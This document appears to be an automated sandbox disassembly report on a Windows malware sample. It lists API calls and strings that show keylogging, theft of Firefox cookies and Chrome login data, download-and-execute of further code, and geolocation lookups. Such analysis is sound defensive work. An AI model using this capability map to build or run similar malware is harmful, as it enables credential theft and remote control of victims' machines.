                                                  • Opcode ID: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                  • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                  • Opcode Fuzzy Hash: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                  • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758F8), ref: 0041A7EF
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                  • GetLastError.KERNEL32 ref: 0041A84C
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                  • String ID:
                                                  • API String ID: 3587775597-0
                                                  • Opcode ID: 103310cf04500ce32c38addd0cdac7656e248615bb7ef065d6e452f782110849
                                                  • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                  • Opcode Fuzzy Hash: 103310cf04500ce32c38addd0cdac7656e248615bb7ef065d6e452f782110849
                                                  • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 00448301
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                  • String ID: JD$JD$JD
                                                  • API String ID: 745075371-3517165026
                                                  • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                  • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                  • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                  • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 1164774033-405221262
                                                  • Opcode ID: 7e167bda58180c03b49ce26aab7406daea744ba46d58b181a8221f2523f17c51
                                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                  • Opcode Fuzzy Hash: 7e167bda58180c03b49ce26aab7406daea744ba46d58b181a8221f2523f17c51
                                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EF0,?), ref: 0041C37D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EF0,?), ref: 0041C3AD
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EF0,?), ref: 0041C41F
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EF0,?), ref: 0041C42C
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EF0,?), ref: 0041C402
                                                  • GetLastError.KERNEL32(?,?,?,?,?,00474EF0,?), ref: 0041C44D
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C463
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C46A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C473
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2341273852-0
                                                  • Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                  • Opcode Fuzzy Hash: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$CreateFirstNext
                                                  • String ID: 0Q$8eF$HSG$`XG$`XG
                                                  • API String ID: 341183262-3776817981
                                                  • Opcode ID: 46a0ad2989f95e3eb1a37820da83f04ff5dfff9c7a743f50d317e72be6a7a7c5
                                                  • Instruction ID: 3e2b8d556a8fbdbb081ab446324185a4f3aab8361380fbf0113865ad31d0729a
                                                  • Opcode Fuzzy Hash: 46a0ad2989f95e3eb1a37820da83f04ff5dfff9c7a743f50d317e72be6a7a7c5
                                                  • Instruction Fuzzy Hash: 588151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                  • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                  • GetLastError.KERNEL32 ref: 0040A328
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                  • TranslateMessage.USER32(?), ref: 0040A385
                                                  • DispatchMessageA.USER32(?), ref: 0040A390
                                                  Strings
                                                  • Keylogger initialization failure: error , xrefs: 0040A33C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                  • String ID: Keylogger initialization failure: error
                                                  • API String ID: 3219506041-952744263
                                                  • Opcode ID: 697262ab7c9ce7cca0a7958f3f36e9c3e20299e9a74468a1679c6d372b0e0963
                                                  • Instruction ID: bc7b44719e59224dfa2ccda8cade24f8ec1ba8a069f7aee67aec650331f950b6
                                                  • Opcode Fuzzy Hash: 697262ab7c9ce7cca0a7958f3f36e9c3e20299e9a74468a1679c6d372b0e0963
                                                  • Instruction Fuzzy Hash: 8911C131510301EBC710BB769C0986B77ACEB95715B20097EFC82E22D1FB34C910CBAA
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                  • API String ID: 2127411465-314212984
                                                  • Opcode ID: 6894de3bc6e577c40892d2f77092e833365a5ce4837f9d7af9c0eafaea2c8cd5
                                                  • Instruction ID: cc57822c2a7f940fffebe33daf0632284ddc1748a3b8d5e961f42c670a34d5b4
                                                  • Opcode Fuzzy Hash: 6894de3bc6e577c40892d2f77092e833365a5ce4837f9d7af9c0eafaea2c8cd5
                                                  • Instruction Fuzzy Hash: D1B1F671A0430066CA14BB76DC579AF36A89F91748F40053FB906671E2EE7D8A48C6DA
                                                  APIs
                                                  • _free.LIBCMT ref: 00449292
                                                  • _free.LIBCMT ref: 004492B6
                                                  • _free.LIBCMT ref: 0044943D
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                  • _free.LIBCMT ref: 00449609
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  • Opcode ID: 51f86c74b073203e9061764edbd822ad27a2adf08808d2d4af20b7bfc8d7082b
                                                  • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                  • Opcode Fuzzy Hash: 51f86c74b073203e9061764edbd822ad27a2adf08808d2d4af20b7bfc8d7082b
                                                  • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadExecuteFileShell
                                                  • String ID: 0aF$0aF$C:\Users\user\Desktop\1.exe$open
                                                  • API String ID: 2825088817-2351675604
                                                  • Opcode ID: be0ce72c42ed3303e3eb1628101f5c6d26f5b2e6c5e894ef2e342bf030b70aee
                                                  • Instruction ID: e12f74d6213dd3660153607da8c9b98f7978e2d251169c1aa1e307be856b925d
                                                  • Opcode Fuzzy Hash: be0ce72c42ed3303e3eb1628101f5c6d26f5b2e6c5e894ef2e342bf030b70aee
                                                  • Instruction Fuzzy Hash: 1461C471A0830166CA14FB76C8569BE37A59F81758F40093FF9427B2D2EE3C9905C79B
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0040884C
                                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                  • String ID: xdF
                                                  • API String ID: 1771804793-999140092
                                                  • Opcode ID: c857024c7452d3864170fb4a205c208d37efd6496280c3c4c206210e1bbe1c46
                                                  • Instruction ID: 967e03bdddb214c30410211942a515ee3c29859e80101891d5c5db132fd2cd64
                                                  • Opcode Fuzzy Hash: c857024c7452d3864170fb4a205c208d37efd6496280c3c4c206210e1bbe1c46
                                                  • Instruction Fuzzy Hash: 94517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB99
                                                  APIs
                                                    • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
                                                    • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
                                                    • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                                  • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                  • ExitProcess.KERNEL32 ref: 0040F905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: 5.2.0 Pro$HVP$override$pth_unenc
                                                  • API String ID: 2281282204-714221754
                                                  • Opcode ID: 5a45b03c759602c88ea6d8ecb3df8d98704a39d34d1a1f58b1bab73212f75496
                                                  • Instruction ID: 0454f1d730b8de97e77b6af0221289a353f5645d6d0bcfbcd4472c6607f37e61
                                                  • Opcode Fuzzy Hash: 5a45b03c759602c88ea6d8ecb3df8d98704a39d34d1a1f58b1bab73212f75496
                                                  • Instruction Fuzzy Hash: 7421E171B0420127D6087676885B6AE399A9B80708F50453FF409672D6FF7C8E0483AF
                                                  APIs
                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                  Strings
                                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                  • String ID: http://geoplugin.net/json.gp
                                                  • API String ID: 3121278467-91888290
                                                  • Opcode ID: 2cc4c98366e7808a271e7c632f75cb50a4f1af551eb6cb73e97900443625eaee
                                                  • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                  • Opcode Fuzzy Hash: 2cc4c98366e7808a271e7c632f75cb50a4f1af551eb6cb73e97900443625eaee
                                                  • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                  • GetLastError.KERNEL32 ref: 0040BA93
                                                  Strings
                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                  • UserProfile, xrefs: 0040BA59
                                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                  • API String ID: 2018770650-1062637481
                                                  • Opcode ID: dc2b2689bc299d8874a4aac579e14b6bb7d4073350ebb0a6e73faa8ce1665e3c
                                                  • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                  • Opcode Fuzzy Hash: dc2b2689bc299d8874a4aac579e14b6bb7d4073350ebb0a6e73faa8ce1665e3c
                                                  • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                  • GetLastError.KERNEL32 ref: 004179D8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID: SeShutdownPrivilege
                                                  • API String ID: 3534403312-3733053543
                                                  • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                  • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                  • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                  • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
